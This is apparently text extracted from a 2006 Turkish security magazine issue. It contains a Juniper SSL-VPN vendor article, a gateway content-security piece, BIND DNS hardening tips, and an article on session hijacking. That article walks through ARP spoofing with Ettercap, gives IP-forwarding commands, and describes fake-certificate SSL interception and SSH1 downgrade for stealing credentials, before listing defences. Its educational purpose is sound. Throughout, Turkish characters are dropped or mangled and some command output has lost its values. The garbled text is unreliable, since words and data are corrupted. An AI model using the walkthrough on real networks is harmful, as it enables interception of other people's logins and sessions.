platformlar nda çal flabiliyor olmas etken oldu. Hakan ATU Sistem ve Network Yöneticisi TÜB TAK - Marmara Araflt rma Merkezi BEYAZfiAPKA 7

7 BSAPKA SAYI2 4/21/06 7:08 PM Page 8 SSL - VPN SSL - VPN SSL - V Juniper, SSL-VPN ürününü kurumlar n güvenli eriflim ihtiyaçlar n karfl lamak üzere tek bir kutuda toplad, Juniper binlerce kullan c ya hizmet verebilmektedir. kullan lmaktad r. Bu sayede ürün grubu 10 kullan c dan Networks Secure Access. Özellefltirilebilir Görünüm SSL-VPN Nedir? Secure Access tüm ekran görüntüleri özellefltirilebilir flekilde tasarlanm flt r. Haz r de ifltirme formlar ile kurumlar SSL-VPN, dünyadaki herhangi bir bilgisayardan (desktop, laptop, mobil ayg t) standart bir web taray c yaz l m kullanarak VPN sisteme eriflimi mümkün k lan bir teknolojidir. görünüm biçimini istedikleri gibi tasarlayabilirler. logolar n ve uyar lar n istedikleri pencerelere ekleyebilir, IPSec VPN sisteminin aksine, SSL-VPN hizmetlerinde istemci bilgisayarlara herhangi bir yaz l m yüklemek gerekmemektedir. Bu özelli i sebebiyle SSL-VPN teknolojisi Cli- Ürün çeflitli ihtiyaçlar karfl layan birkaç lisanslama modeli Modüler Sistem entless VPN (istemcisiz VPN) olarak da adland r l r. SSL-VPN 3 önemli avantaj bulunur: 1. Kolay Yönetim SSL-VPN sistemi tek bir cihaz üzerinde çal flt için h zl yönetim ve bak m yapmak mümkündür. 2. Kolay Kullan m Sistem herhangi bir internet taray c s kullanabilen herkes taraf ndan kolayca çal flt r labilir. Kullan c lar için ekstra e itim gerekmez. Herhangi bir istemci yaz l m bulunmad - ndan kullan c lar n anlayamayacaklar hatalar ya da mesajlar almalar söz konusu de ildir. 3. Düflük Maliyet SSL-VPN istemcilerinde herhangi bir yaz l m olmad için yürütme ve destek maliyetleri s f ra yak nd r. Kullan c lar internet taray c lar ile sisteme eriflti inden sistem kullan m ve güncelleme e itimleri ihtiyaçlar minimize edilmekte ve yürütme maliyeti önemli ölçüde azalt lmaktad r. içerir. Bu sayede kurumlar ihtiyaç duymad klar özellikler için yat r m yapmayarak toplam sahip olma maliyetlerini düflürebilirler Network Connect Modülü Bu modül SSL-VPN sistemini standart bir IPSec VPN hizmetine çevirebilir ve tüm tcp/ip trafi ini VPN sisteminden geçirebilir. Özellikle sistem yöneticilerinin kulland bir modüldür. Secure Application Manager (SAM) Modülü SAM modülü, Network Connect modülüne ihtiyaç duymaks z n belirli kaynaklara eriflim sa layabilir. Örne in intranet web sunucular, web tabanl ifl yaz l mlar, b2b siparifl sistemleri, Microsoft Terminal Servisleri, Citrix, Microsoft Exchange Server ve Lotus Notes gibi uygulamalar kolayl kla VPN istemcileri ile paylafl labilir. Üstelik uygulama paylafl mlar yap l rken VPN istemcilerinde herhangi bir tan m yapmak gerekmez. 8 BEYAZfiAPKA Neden Juniper Networks? Üstün performans ve benzersiz güvenlik özellikleri ile Juniper Networks Secure Access ürünü sektörde önemli baflar lar göstermifl ve InfoWorld Technology of The Year 2006, NetworkWorld Best Of Test 2005, InfoWorld Top Honors 2005, Communication News Editors Choice 2004 gibi say s z ödül kazanm flt r. Q Gartner raporunda aç k ara lider olan Juniper Network Secure Access ürün grubu tüm dünyada oldu u gibi ülkemizde de önemli referanslara sahiptir. Gartner raporunun online kopyas na eriflmek için: Juniper Networks; Türkiye de bulunan ofisi, uzmanlaflm fl da t c lar ve ifl ortaklar ile güçlü çözümler sunmaktad r. Secure Access Teknik Özellikleri Juniper, SSL-VPN hizmetlerinin yan s ra bir çok geliflmifl güvenlik, eriflim ve birlikte çal flma ihtiyaçlar n karfl lar. Bu sebeple ürün grubunun Juniper SSL-VPN olan eski ad Juniper Networks Secure Access olarak de ifltirilmifltir. Güvenli ve H zl SSL-VPN Secure Access ürün grubunun tamam özellefltirilmifl ve güvenlik kat laflt rmas ve optimizasyonu yap lm fl donan mlardan oluflmaktad r. Yüksek kullan c say lar nda performans ihtiyac n karfl lamak üzere SSL h zland r c kartlar Secure Meeting Modülü Mobil kullan c lar, bayi veya acenteler Secure Meeting modülünü kullanarak çevrimiçi toplant lar düzenleyebilirler. Bu sayede kurumlar n e itim ve toplant ihtiyaçlar hem h zl bir biçimde karfl lanm fl olur hem de bu aktiviteler için yap lan harcamalarda önemli bir tasarruf sa lanabilir. Kimlik Do rulama Microsoft Active Directory ve Ldap ba lant lar ile kolay yönetim; SecureComputing SafeWord, RSA SecurID ve tim Radius yaz l mlar ile entegrasyon sayesinde güvenlik ihtiyaçlar güçlü bir flekilde karfl lanabilir. Secure Access ile one-time-password üreten token cihazlar n entegre etmek oldukça kolayd r. Bu hizmetler ile flifrelerin 30 saniyede bir otomatik olarak de iflmesi sa lanabilir. Cache Cleaner Web tabanl yaz l mlar n ni için gelifltirilmifl özel bir uygulamad r. SSL-VPN sistemi ba lant s ile çal flt r lm fl web uygulamalar n n istemciler üzerinde b rakt geçici dosyalar ve oturum art klar n otomatik olarak siler. Cache cleaner özelli i Microsoft Exchange Outlook Web Access ve Lotus Notes Web Access için de kullan - labilir.

8 BSAPKA SAYI2 4/21/06 7:08 PM Page 9 PN SSL - VPN SSL - VPN Tunç GÜNERGUN Sistem Mühendisi / Juniper Networks Türkiye Juniper Intrusion Detection&Prevention (IDP) Juniper IDP ürünü endüstri standard bir a tabanl atak engelleme sistemidir. Secure Access ve IDP ürünleri entegre çal flt r labilir. Secure Access, tüm SSL-VPN trafi ini Juniper IDP ürününe göndererek güvenlik denetimi yapt - r r. IDP ürünü trafik içinde bir atak tespit etti inde Secure Access ürününe uyar gönderir. Secure Access söz konusu ata n hangi kullan c oturumunda bulundu unu tespit eder ve önceden belirlenmifl güvenlik politikas n uygular. Sistem bir atak tespit edildi inde söz konusu oturumu kapatmak veya ilgili kullan c ad n otomatik olarak pasif hale getirmek üzere programlanabilir. Advanced for SA Yüksek güvenlik ihtiyaçlar ve karmafl k a uygulamalar na olanak sa layan modüldür. Secure Access Ürün Portföyü Juniper Networks, her boyutta ihtiyac karfl lamak üzere genifl bir donan m ve yaz l m yelpazesi oluflturmufltur. Secure Access ürünlerinin seçimi 3 temel ad mda yap l r. ni Yüksek Eriflilebilirlik High Availability hizmetleri ile birden fazla Secure Access ürünü kümelendirilerek çal flt r labilir. ki güç kayna ve RAID1 mimarisi ile hizmetin güvenilirli i art r labilir ve uptime süresi uzat labilir. Instant Virtual System (IVS) Tek SSL-VPN cihaz ile sanal cihazlar yarat labilir. Grup tabanl vlan sistemi ile grup/domain yönetimi ve eriflimi kolaylaflt r l r. Her bir gruba ayr yöneticiler atanarak yetki da- t m sa lanabilir. Host Checker API ve NAC VPN iste inde bulunan bilgisayarlar üzerinde güvenlik denetimleri yap labilir. Kurumsal güvenlik politikas na uyum sa layamayan istemcilerin istekleri reddedilebilir, kendilerini güncellemeleri için yol gösterilebilir ya da güvenlik politikas uygulanmas için bilgisayarlar zorlanabilir. 1. Kullan c Say s Ürün lisanslamas efl zamanl kullan c say s hesap edilerek yap l r. Bu sayede kullan c lara önemli bir maliyet avantaj yarat lm flt r. 10 kullan c dan 5 bin kullan c ya kadar lisanslama seçimi yap labilir. 2. Donan m Seçimi Kullan c say s na göre uygun donan m seçmek gerekir. 5 farkl model her boyutta yükü tafl mak üzere tasarlanm flt r. 3. Yaz l m Seçimi Secure Access ürünü çeflitli ihtiyaçlar karfl lamak üzere Secure Application Manager, Network Connect, Advanced for SA, Secure Meeting, SSL Acceleration ve Instant Virtual System lisanslama modellerini sunar. Kurumlar sadece ihtiyaç duyduklar yaz l m lisanslar n sat n alarak maliyet avantaj sa layabilirler. Modüller birbirinden ba- ms z olup ilerleyen zamanda ihtiyaç duyulmas halinde sisteme kolayca eklenebilir. Ürün Deneyimi Juniper Networks Türkiye, do ru ürün seçimini ve do ru konumland rmay için ifl ortaklar ile birlikte demo ürün imkan tad r. Türkiye nin kurumsal bilgi platformu olan Beyaz fiapka daki bu ilk yaz m zda, SSL-VPN teknolojileri ve Secure Access ürünümüz ile ilgili bilgi aktarmaya çal flt m. Beyaz fiapka n n bir sonraki say s nda buluflmak üzere... Sayg lar mla... BEYAZfiAPKA 9

9 BSAPKA SAYI2 4/21/06 7:08 PM Page 10 Session Hijacking H 10 BEYAZfiAPKA alihaz rda sunucu ve istemci aras nda kurulmufl bir oturumun üçüncü bir kifli (sald rgan) taraf ndan dinlenmesi, bu oturum esnas nda tafl nan data paketlerinin içerik de iflimine u rat ld ktan sonra tekrar hedeflenmesi veya bu oturumun tamamen sald rgan n eline geçmesi günümüzün TCP/IP a lar n da oldukça mümkündür ve bu tip sald r lara Session Hijacking ad verilir. TCP/IP a larda genellikle istemci ve sunucu oturumu, sunucunun kimlik sorgulamas ile bafllar (Telnet, Ftp...) ve sorgulama onayland ktan sonra iletiflim sonland r l ncaya kadar ba lant güvenli kabul edilir ve baflka bir sorgulamaya gerek görülmez. Session Hijacking sald r lar bu gerçe e dayan larak planlanm flt r. Bu tip sald r lar 3 ana kategoride incelemek mümkündür.man-in-the-middle (MITM), blind hijacking ve Session Theft. MITM sald r lar nda sald rgan tüm network trafi ini kendi üzerinden geçirerek dinler ve iste i do rultusunda paketleri de ifltirebilir. Blind Hijacking, sald rgan n networkü dinleyebilme lüksü olmad durumlarda kullan l r ve paket içeri ini de ifltirip hedefe yollamaktan ibarettir; hedefin bu pakete verdi i yan t göremez. Sald rgan n, TCP oturum numaralar n da do ru tahmin etmek zorunda oldu unu düflünürsek MITM sald r lar yla karfl laflt rd m zda baflar oran daha düflüktür. Son grupta ise sald rgan sadece bilgiyi çalmakla kalmaz; bu bilgiyi kullanarak yeni oturumlar açabilir. Oturum numaras (Session ID), HTTP GET, HTTP PUT komut içerikleri incelenerek veya cookienin tamam çal narak elde edilebilir ve bu bilgi kullan larak oturum yeniden aç labilir. lk iki grup network seviyesinde, üçüncü grup ise uygulama seviyesinde gerçeklefltirilir. Sald r n n gerçeklefltirilece i konuma göre farkl metotlar kullan labilir.session hijacking wide area network (WAN) üzerinden gerçeklefltirilecek ise IP Spoofing, local area network (LAN) üzerinden gerçeklefltirilecek ise paket izleme (Sniffing) teknikleri kullan l r.bir switch ortam nda gerçeklefltirilecek MITM sald r s için tüm paketlerin sald rgan n network izleyicisi üzerinden geçmesi gerekmektedir. Ancak switchlerin çal flma prensibi gere i, switch ortam na ba l her host sadece kendisini ilgilendiren trafi i ve o networkün tüm broadcast paketlerini alabilir. Sald rgan tüm trafi in kendi üzerinden geçmesini istiyor ise bu sorunu ortadan kald rmak için farkl yöntemler uygulayacakt r. Sahte ICMP type 5 (redirect) paketleri üreterek sunucu ve istemciyi kendisinin daha uygun bir yol (route) oldu una inand rabilir veya DHCP Spoofing yaparak kendisinin default gateway oldu u DHCP paketleri ile sunucular n ve istemcilerin IP konfigürasyonunu de ifltirebilir. Bir baflka ve en çok tercih edilen metot ise Arp-spoofing yöntemidir. TCP/IP networkte bulunan her bir host bir arp tablosu tutar ve bunu IP-MAC adres çevriminde kullan r. Sald rgan bir eternet networküne sahte Arp paketleri yollayarak network cihazlar n flafl rtabilir ve tüm trafi in kendi üzerine akmas n sa layabilir. Arpspoofing için gelifltirilmifl bir çok yaz l m mevcuttur (Fake, Hunt, Ettercap, Arp0c)... Ettercap-NG yaz l m n kullanarak bir switch ortam nda arp-spoofing yapmaya çal flal m ve sonuçlar n gözlemleyelim. Arp-spoofing yapmadan önce ve sonra networkdeki herhangi bir hostun arp tablosuna bir göz atal m: Interface: x10005 Internet Address Physical Address Type c f dynamic c-29-d7-98-0b dynamic Interface: x10005 Internet Address Physical Address Type c-29-d7-98-0b dynamic c-29-d7-98-0b dynamic c-29-d7-98-0b dynamic c-29-d7-98-0b dynamic Birinci arp-a ç kt s nda her fley normal görünmekte, ancak ikinci durumda (arp-spoofing etkin) tüm hostlar n MAC adreslerinin ayn oldu u gözlemlenmekte. Bu durumda arp-spoofing ifle yaram fl, networkdeki tüm hostlar tüm trafi i 00-0c-29-d7-98-0b MAC adresine yollayacakt r ki bu sald rgan n bulundu u hosttur. Ettercap yaz l m n n, trafi i, kendi üzerinden geçirdikten sonra gitmesi gereken hedeflere gönderebilmesi için bulundu u hostta Ip_forwarding ozelli inin etkin hale getirilmesi gerekti ini unutmayal m. Afla daki komutlar kullan larak bu ifllem kolayl kla gerçeklefltirilebilir. echo 1 > /proc/sys/net/ipv4/ip_forward (Linux) sysctl -w net.inet.ip.forwarding=1 (BSD) fiu ana kadar yap lan ifllemler bize, o networkteki tüm trafi i izleme imkan sa layacakt r. Tabii ki arp-spoofing etkin hale getirildikten sonra trafi i herhangi bir sniffer yaz l m kullanarak networku dinlemek de mümkündür.(ethereal, Network General sniffer pro Lan etc.). Ancak ettercap kullanmak bize binlerce paketin içeri ine bakmaks z n kullan c ad ve flifre bilgilerini otomatik olarak verecek ayn zamanda aktif olarak oturumlara müdahale etmemize olanak sa layacakt r. Msn messenger, icq, yahoo, , telnet, ftp, http trafi ini tüm detaylar ile görebilir, kullan c lar n aktif ba lant lar n sonland rabiliriz. Yaz l m n bir baflka ilginç özelli i ise trafik filtrelemesi yapabilmesidir. fiifrelenmemifl tüm trafi i diledi imiz gibi de ifltirip tekrar hedefleyebiliriz. Örneklemek gerekirse,

10 BSAPKA SAYI2 4/21/06 7:08 PM Page 11 Coflkun KAM LO LU CISSP ni google.com un o çok bilinen logo.gif imaj n diledi imiz bir baflka imaj dosyas yla de ifltirebiliriz.bu bir web defacement de ildir; sadece, sunucudan istemciye akan trafi in içerik de iflimine u rat lmas d r. Ettercap, https trafi ini dinlemek gibi çok daha karmafl k sald r lar da bile kullan labilir.hepimizin bildi i gibi bir sertifika uyar s görmeden https ba lant s yaratmak için birkaç koflulun sa lanmas gerekmektedir. Sertifikan n güvenilir bir kurum taraf ndan imzalanm fl olmas (Verisign etc.) ve sertifika süresinin bitmemifl olmas gibi. Bu durumlar haricinde web browser sertifika uyar s verir ve devam etmek isteyip istemedi imizi sorar. Bir çok durumda kullan c lar bilmedikleri her fleye YES deme içgüdüsünü kullanarak web browser n bu iste ini olumlu karfl larlar. Sald r senaryosu oldukça basittir. Ettercap kullan larak sahte bir sertifika haz rlan r ve kullan c -sald rgan aras ndaki SSL ba lant s nda bu sertifika kullan l r. Öte yandan bir baflka SSL ba lant s da gerçek sertifika kullan larak sald rgansunucu aras nda yarat l r. Sald rgan hem ssl istemci hem de ssl sunucu vazifesi görür. Sonuç olarak kullan c bilgileri gerçek web sunucusuna gönderilmeden önce, yaratm fl oldu umuz sertifika kullanarak elde etmemiz mümkün hale gelir. fiifrelenmifl trafikte uygulanabilecek bir baflka metot ise Downgrade sald r lar d r.ssh ba lant lar nda s kça kullan lan bu metotta ise sald rgan paket içeri ini de ifltirir ve istemciyi SSH2 gibi çok daha güvenli bir ba lant yapmak yerine SSH1 ba lant s yapmaya zorlar. SSH sunucu her iki ba lant y destekliyor olsa bile sald rgan istemcinin sadece SSH1 destekledi i bilgisini kullan r ve ba lant SSH1 kullan larak gerçeklefltirilir ve SSH dissector kullan larak kullan c ad ve flifre bilgileri kolayca elde edilir. fiu ana kadar bahsetti imiz tüm metotlar MITM kullan larak oturumlara müdahale etmek ve data paketlerini de ifltirmekten ibarettir. Oturumu tamamen üzerimize almak niyetinde isek T-sight (windows), Juggernaut (nix), Hunt (nix), TTYwatcher (Solaris) gibi farkl programlar kullanmak mümkündür. Afla daki örnek arp-spoofing etkin bir switch ortam nda gerçeklefltirilmifltir. TCP Session hijacking tamamen TCP s ra numaralar n tahmin etme esas na dayanmaktad r. Hunt ayn zamanda bir network sniffer oldu u için tahmine gerek kalmadan istemciden sunucuya gitmesi gereken bir sonraki paketin s ra numaras n kullanarak istemciyi devre d fl b rak p sunucu ile ba lant ya kolayca geçebilir ve istenilen komut sunucuya gönderilebilir.udp de ise bu protokolün do as gere i s ra numaralar n takip etmek gibi bir sorunumuz olmad ndan, durum çok daha vahimdir. Bu tip sald r lar n güvenlik dünyas nda oldukça genifl bir yer kaplad n düflünecek olursak sald r lara karfl al nabilecek önlemlerin tamam na de inmemiz pek mümkün görünmemektedir. Güvenlikle ilgili bir çok web sayfas nda static arp kullanman n sorunu çözece i önerilse bile bunun getirece i yönetimsel zorluklar buna imkan tan mayacakt r. (10 bin kullan c l bir network de yaklafl k 100 milyon static mac adresi girmek!) Arpwatch gibi programlar networkün MAC adres veritaban n tutabilir ve de ifliklikleri yöneticilere haber verebilir. Ettercap arp-posining de kullan labildi i gibi bu tip sald r lar saptamak amac için de kullan labilir.switch port security al nabilecek bir baflka önlemdir ve hangi MAC adresinin hangi port için kullan labilece ini belirtmemize olanak tan r. Kimlik kan tlama ve flifreleme bu tip ataklar büyük ölçüde ortadan kald rmaktad r. Ipv6 da bu iki özellik tasar m aflamas nda eklendi i için spoofingi büyük ölçüde engelleyece i tahmin edilmektedir.s- ARP(secure ARP) henüz tasar m aflamas nda olan PKI esas na dayal bir baflka yöntemdir. Tüm bu önlemlere ek olarak flu anda kullan labilecek en etkili yöntem IPSEC tir.özellikle yönetim amaçl yap lan uzak ba lant lar peer-to-peer vpn üzerinden yap lmal, Telnet gibi mevcut olmayan protokoller kullan lmamal d r. BEYAZfiAPKA11

11 BSAPKA SAYI2 4/21/06 7:08 PM Page 12 A Geçidi çerik Güvenli i A 12 BEYAZfiAPKA tehditlerinin her geçen gün daha sofistike hale gelmesi ve say lar n n artmas güvenlik ürünlerinin iflini gün geçtikçe daha fazla zorlaflt r yor. Art k çok katmanl bir bütün olarak düflünmemiz zorunlu hale geldi. Tehditlerin karmafl klaflan yap lar dolay s yla tek tek güvenlik ürünleri yetersiz kalmaktad r. Örne in anti virüs yaz l mlar iflletim sistemlerini hedef alan ataklar n önüne ço u kez do alar gere i geçememektedir. A atak önleme çözümleri ise spesifik bir sunucuya yönelmifl flifreli ataklar önleyemezler. Günümüz dünyas nda a güvenlik çözümleri merkezi olarak yönetilebilen, esnek ve çok katmanl sistemlerden oluflmal d r. A Geçidi (Gateway) çerik Güvenli i de yukar da bahsetti im çok katmanl yap n n en önemli parçalar ndan birisidir. Temelde WEB protokolleri ve e-posta protokolleri üzerinden akan trafi in zararl içerikler bak m ndan denetlenmesidir. Bunlar virüs, spam, doland r c l k amaçl elektronik postalar ve uygunsuz web sitelerine girifli engelleyen filtreleme fonksiyonlar n n tamam n kapsayan bütünleflik çözümler olmal d r. fiu anda piyasa da sunulan bu amaca yönelik güvenlik çözümlerinin bir k sm sadece içerik ne yönelik donan m çözümleriyken, baz lar ise içerisinde IPS ve Firewall fonksiyonlar n da kapsayan tek bir cihaz üzerinde (genelde PC tabanl ) tümleflik ve çok fonksiyonlu ürünlerdir. IDS/IPS, Firewall ve içerik ni tek kutuda birlefltiren çözümler genellikle küçük ölçekli kurumlarda tercih edilen gatewayde ihtiyaç duydu unuz temel fonksiyonlar içeren performans ve fonksiyonelite anlam nda s n rl çözümlerdir. Güvenlik gereksinimleri, pratiklik ve maliyetleri düflünerek, baz kurumlar bu çözümleri seçiyor. Ancak daha büyük kurumlarda çerik, IPS ve Firewall fonksiyonlar n dedike ve iyi performansl (gerekti inde ASIC tabanl ) cihazlarda sunulmal d r. fiu anda pazar n e ilimleri de güvenlik fonksiyonlar n n hareket sahas, ifl süreklili i ve performans kriterlerini dikkate alarak belli bir ifle odakl çözümlerden yana gözüküyor. (IDC: 2007 ye kadar, tüm güvenlik çözümlerinin % 80 i dedike cihazlar olacak. Worldwide Threat Management Security Appliances Forecast and 2003 Vendor Shares September 2004, IDC report #31840.) Dedike çal flan bir içerik filtreleme cihaz, a da transparent olarak konumland r labilmelidir ve firewall lardan ba ms z çal flabilmelidir. Dolay s yla tüm firewall larla kullan labilir. Üzerinden geçen SMTP ve POP3 trafi indeki zararl kodlar kontrol eder. SMTP trafi ini spam kontrolüne tabi tutar. Merkezi olarak yönetilebilir. Yap lacak analizler do rultusunda büyük ölçekli kurumlarda WEB (HTTP, FTP) ve e-posta (SMTP, POP3) trafi i ayn cihaz üzerinde de il farkl cihazlar üzerinde taranabilir. (ISP, Telco ve büyük flirketler için) Güvenli Mesajlaflma (E-posta Güvenli i) sistemlerimizde önceliklerimiz. 1: Son kullan c taraf ndan konfigure edilebilir black list ler. 2: Son kullan c taraf ndan konfigure edilebilir white list ler (MS Outlook entegrasyonu ile) 3: Son kullan c taraf ndan yönetilebilir karantina (Inbox a geribesleme ve false positve ler (Spam olmayan posta hatas - Spam filtre ayarlar ne kadar hassas ayarland ysa, false positive oran o kadar yüksek olur) için Bayesian filtreleme (Bayesian analizi, spam postalar n analizlerinden oluflan istatistikleri kullanarak kendi kendine ö renir) 4: Bayesian Filtreleme için manuel ö renme (Bayesian filtrelemeyi gelifltirmeye yönelik false pozitifler için geribesleme mekanizmas. 5: Puanlama sistemine dayal anti-spam motoru ile entegre RBL (3. parti black list) deste i 6: Anti-Phishing filtreleme (anti-fraud / doland r c l k, sahtekarl k amaçl e-postalar) 7: Merkezi yönetim ve raporlama sistemi 8: IMAP deste i (Internet Message Access Protocol) 9: SPF deste i (envelope return-path authentication) 10: Posta fiifreleme / Encryption (TLS) 11: Directory Harvesting Ataklar ndan korunma. (Spamci

12 BSAPKA SAYI2 4/21/06 7:08 PM Page 13 Özgür C VEK ni SMTP protokolünün avantajlar n kullanarak, kurban domain e sürekli e-posta lar gönderir. Bunlar n birço u gerçek bir adresle eflleflmemesine ra men reddolmaz, sald rgan geçerli e-posta adresi bulana kadar devam eder. (Maksimum birkaç saat al r bu ifl.) Dünyada, her gün ortalama 15 bin atak bu flekilde atak meydana geliyor. WEB/ çerik Güvenli i sistemlerimizde önceliklerimiz. 1: Filtering/Internet eriflim kontrolü 2: ICAP deste i 3: merkezi yönetim ve raporlama 4 Uygulama baz nda önceliklendirilmifl band geniflli i yönetimi 5: Streaming media kontrolü (çal flanlar n kullan m için izin vermek ya da yasaklamak) 6: Yüksek performansl HTTP tarama (tek cihaz üzerinde Mbps) 7: P2P dosya paylafl m kontrolü 8: An nda mesajlaflma protokolleri ve yönetimi (HTTP traffi inden ayr olarak) 9: Pop-up Ad bloklama 10: SSL sonland rma 11: Caching deste i Neden WEB ve e-posta içerik filtreleme bu kadar önemli ve özel olarak ele al nmas gereken bir konu? 2004 y l nda gerçekleflen büyük sald r lar n %85 i web üzerinden ya da e-posta yolu ile yap lm flt r. Mydoom, Netsky ve Bagle gibi solucanlar milyarlarca dolarl k zarara yol açt lar, e-posta sistemlerimiz ve networklerimiz çal flmaz hale geldi. Spam fleklinde yay lan bu tarz virüsler networklerimizde arka kap lar yaratarak milyonlarca kifliye spam gönderdi y l ndan itibaren art k sald r lar n web üzerinden gelmeye bafllad n gördük öncesinde web trafi ini güvenlik alt na almay düflünen pek yoktu, fakat flimdi web sa layan cihazlar y ll k % 50 lik bir art flla yay l yor.(600 milyon $ / 2005 y l - network IPS pazar ndan daha büyük- IDC). Source: IDC August 2004, PM, and Raymond James Reporting Spyware lere bakal m. Makinenizi harabeye çevirebilir, band geniflli inizi harcar ve iflinize do rudan etki eder, spyware ifl süreklili i için çok ciddi bir tehdittir. Di er yandan help-desk maliyetlerini art r r. Mesela DELL e gelen destek ça r lar n n % 25 inin spyware kaynakl oldu u rapor edilmifl. 3. temel faktör çal flan verimlili i dir. Burada SPAM ilk s radaki düflman m z. Günde kaç tane e- posta al yorsunuz? Bunun kaç tanesi gerçekten do rudan size gelmifl ve ifl için kullan yorsunuz? Yap lan istatistikler tüm postalar n %75 inin spam oldu unu gösteriyor. Bill Gates, 2004 y l nda spam in çözülece ini söylemiflti. Ama görünen o ki çok yan ld. Spamciler taktiklerini sürekli de ifltiriyor. Bizler bir anda spam engelleyen cihazlar m z n ifle yaramad n görüyoruz. Sonuç flu spam kontrol alt nda de il. Ancak dedike cihazlarla, % 95 üzerinde bir oranla spam i durdurman z mümkün. Çal flan verimlili i ile ilgili ikinci problem nternet te sörf yaparken harcanan zaman ve daha da önemlisi flirket kaynaklar n n iflte yap lmamas gereken çeflitli download- larla bofla harcanmas d r. Çözüm web filtreleme ve raporlama. Web filtreleme spyware lerin networkümüze girmesini engelleyen 2 temel yoldan birisidir. Di er yol ise pattern dosyalar kullanmakt r. Pattern methoduyla virüsleri nas l engelliyorsak, spyware i ayn flekilde engelleriz. Web filtering %100 koruma garanti edemez ancak pattern dosyalar metodu kullanarak %100 koruma sa layabilirsiniz. Piyasada bulunan ve gateway antispyware çözümü sunan flirketleri incelerken bu ayr ma dikkat edilmelidir. Özetlersek A Geçidi (Gateway) çerik Güvenli i ni afla daki temel bafll klarda toplayabiliriz. Baz maddeler yukar da belirtti im husustan dolay her iki bafll k alt nda da yer almal d r. BEYAZfiAPKA13

13 BSAPKA SAYI2 4/21/06 7:08 PM Page 14 Güvenlik Ayarlar D 14 BEYAZfiAPKA ergimizin ikinci say s nda güvenlik ayarlar konumuza devam ediyoruz. lk say m zda Microsoft DNS sunucusunun ince ayarlar ndan bahsetmifltik. Bu say m zda da Unix/Linux platformlar nda en çok kullan lan dns sunucusu olan BIND DNS sunusu ve ince ayarlar ndan bahsedece iz. BIND (Berkeley Internet Name Domain) sunucusunu seçmemizin nedeni; günümüzde Internet`te DNS servisi sa lamada en çok kullan lan yaz l m n BIND olmas ve hemen hemen tüm Unix çeflitlerinde (BSD`ler ve Linux gibi ücretsiz olanlar dahil) çal flmas, hatta BIND n Windows sürümlerinin de bulunabilmesi. Afla da k saca BIND için geçerli olan bir tak m ayarlar ve önlemlerden bahsedece iz. Ama önce asl nda tüm yaz l mlar için geçerli olan bir hususu özellikle belirtmekte fayda görüyorum; Kulland n z yaz l m ne olursa olsun üreticinin sayfas ndaki yeni yama ve güncellefltirmeleri mutlaka kontrol edin ve gerekli olanlar yükleyin. Genelde güvenlik aç klar n yamas ile birlikte anons ederler. Ayr ca BIND kurdu unuz ve iflletti iniz sistemin kendi yama ve güncellefltirmelerini de takip etmeyi unutmay n. Ço u zaman, bir sald rgan sisteme girdi inde, güvenlik aç eski, bilinen bir aç k olur. Bu tuza a düflmeyin! Sistemleriniz üzerinde bulunan aç klar ; cert.org, securityfocus.com gibi internet sitelerinden takip edebilirsiniz. Tabii bunun için sistemlerinizde kurulu olan yaz l mlar n tamam n bilmeniz gerekir. Bunun yerine, sistemlerinizi güvenlik taramas ndan geçirerek buldu u aç klar ve nas l kapat labileceklerini size bildiren, FoundStone, Shadow Sec. Scanner, v.b. yaz l mlar yard m ile de bu aç klar n z sald rganlardan önce bularak kapatabilirsiniz. Ayr ca, BIND in üzerinde çal flt makinenin sadece DNS sunucusu olarak kullan lmas da önemlidir. Üzerinde güvenlik aç klar olabilecek çeflitli programlar n, e er gerekli de illerse, sisteme kurulmalar na ve çal flmalar na izin vermeyin. Kurdu unuz programlar bilin; e er özellikle bu yaz l mlara ihtiyac n z yoksa kald r n! htiyac n z olan ve kulland n z programlar n da güncel oldu una emin olun! fiimdi BIND DNS sunucusuna yap labilecek sald r lar n üzerinden k saca geçerek riskimizi ö renebiliriz. Birçok uygulaman n güvenlik ayarlar n n yap lmas nda geçerli oldu u gibi BIND içinde öncelikle BIND a ve BIND kullan larak sisteme ne gibi zararlar verilebilece i veya ne gibi bilgi kaçaklar na neden olabilece ini ortaya koymak yararl olacakt r. BIND Kullan c lar n Bekleyen Tehlikeler Sunucu üzerinde ki bir aç ktan yararlanarak kötü niyetli kifliler sisteminize s zabilir ve sistemi tamam yla ele geçirebilir. DoS (Denial of Service) ataklar, sald rgan dns sunucunuzun geçici bir süre veya tamamen servis kalmas n sa layabilir. Sald rganlar dns sunucunuzun verilerini de ifltirerek iç ve d fl kullan c lar asl nda olmayan yanl fl adreslere yönlendirebilirler. Bilgi kaçaklar (information leak) yard m yla iç a yap n z n tamam sald rganlar n eline geçebilir. Dns sunucunuzdan d flar daki kaynaklara sald r lar yap labilir. Yukar da s ralad m z atak yöntemleri ile sizin ve d flar daki bir sitenin sistemlerine zarar verilebilir. Afla da bunlar engellemek için özet bilgiler vermeye çal flaca z. BIND Kullan c lar n n Korunmak çin Yapmas Gerekenler Her zaman güncel sürüm ile çal flmak: Hemen hemen tüm eski sürümlerde daha önce sald rganlardan taraf ndan kullan lm fl aç klar bulunmaktad r. Her ne kadar yeni ç kan sürümlerde de yaz l m üreticisi böyle bir aç n olmayaca n garanti edemese de ataklara maruz kalma tehlikesini azaltt için yeni sürümleri kullanmakta fayda vard r. Tabii sürüm güncellefltirmelerinde ne gibi aç klar n kapat ld ya da yaz l ma ne gibi yeniliklerin eklendi ini de göz önünde bulundurman z gerekir. Bir de özellikle Linux platformunda ki yaz l mlar güncelleyecekseniz ayar dosyalar ndaki de ifliklikleri de göz önünde bulundurman zda fayda var. Yüksek eriflebilirlik sa lama(spof engelleme): Baz sald rganlar DoS ataklar ile dns sunucunuzu hedef alabilir. Dns sunucunuz eriflilemez duruma geldi inde hizmet verdi i sistemleri isim-adres çözümlemesini yapamad için internet ile ilgili ifllemlerini yapamazlar. SPoF(Single Point of Failure) engellemek için yap lmas gereken en önemli fley sistemleri çiftler halinde çal flt rmakt r; a ba lant lar, aktif cihazlar ve sunucu sistemleri bunlar n içine dahil edilebilir. Ayr alanlar için ayr sunucular kullanma: Korunma yöntemlerinden en pasif olan yöntem olmakla birlikte en etkililerinden biridir. çerideki sistemlere hizmet verecek sunucu ile d flar ya hizmet verecek sonucunun ayr lmas güvenlik aç s ndan birçok avantaj tad r. En önemli art s ; iç ve d fl sunucular ay rd n zda dns veri zehirlenmelerini büyük ölçüde elemine edilmifl olur. DNS sunucusuna gelen trafi in filtrelenmesi: E er DNS sunucunuz üzerinde baflka servisler vermiyorsan z (Bu zaten önerilmez.) sunucunuza gelen DNS istekleri d fl ndaki trafi i filtrelemekle birçok sorundan 